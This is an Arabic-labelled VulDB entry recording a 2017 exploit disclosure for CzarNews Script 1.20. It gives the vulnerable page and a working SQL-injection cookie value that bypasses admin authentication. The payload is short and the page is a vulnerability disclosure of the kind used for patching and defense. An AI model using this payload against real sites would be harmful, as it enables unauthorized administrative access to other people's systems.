| عنوان | CzarNews Script – Authentication Bypass |
|---|
| الوصف | Introduction
Exploit Title: CzarNews Script – Authentication Bypass
Version: 1.20
Date: 28.01.2017
Vendor Homepage: http://www.czaries.net
Software Download: http://www.czaries.net/scripts/czarnews.php
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
CzarNwes is a news script that provides powerful news manager on your website. It uses the fastest MySql database system that allows quick changes with posting and comment. Users are allowed unlimitedly under some conditoins to access your own database. News can be posted easily and quickly and it supports HTML and other formatting styles. A highly effective admin panel allows you to do everything on your website. Password retrieval system helps you when the password is forgotten. Installation takes less than a minute and it requires php 4.x and MySql database.
Vulnerable Url:
http://locahost/czarnews/cn_users.php
Set new cookie:
Name : recook
Value : admin%2C'or''='
and refresh the page. |
|---|
| المستخدم | KAAN KAMIS (UID 213) |
|---|
| ارسال | 29/01/2017 03:50 PM (9 سنوات منذ) |
|---|
| الاعتدال | 30/01/2017 03:49 PM (24 hours later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 96259 [CzarNews Script 1.20 Cookie /czarnews/cn_users.php recook حقن SQL] |
|---|
| النقاط | 17 |
|---|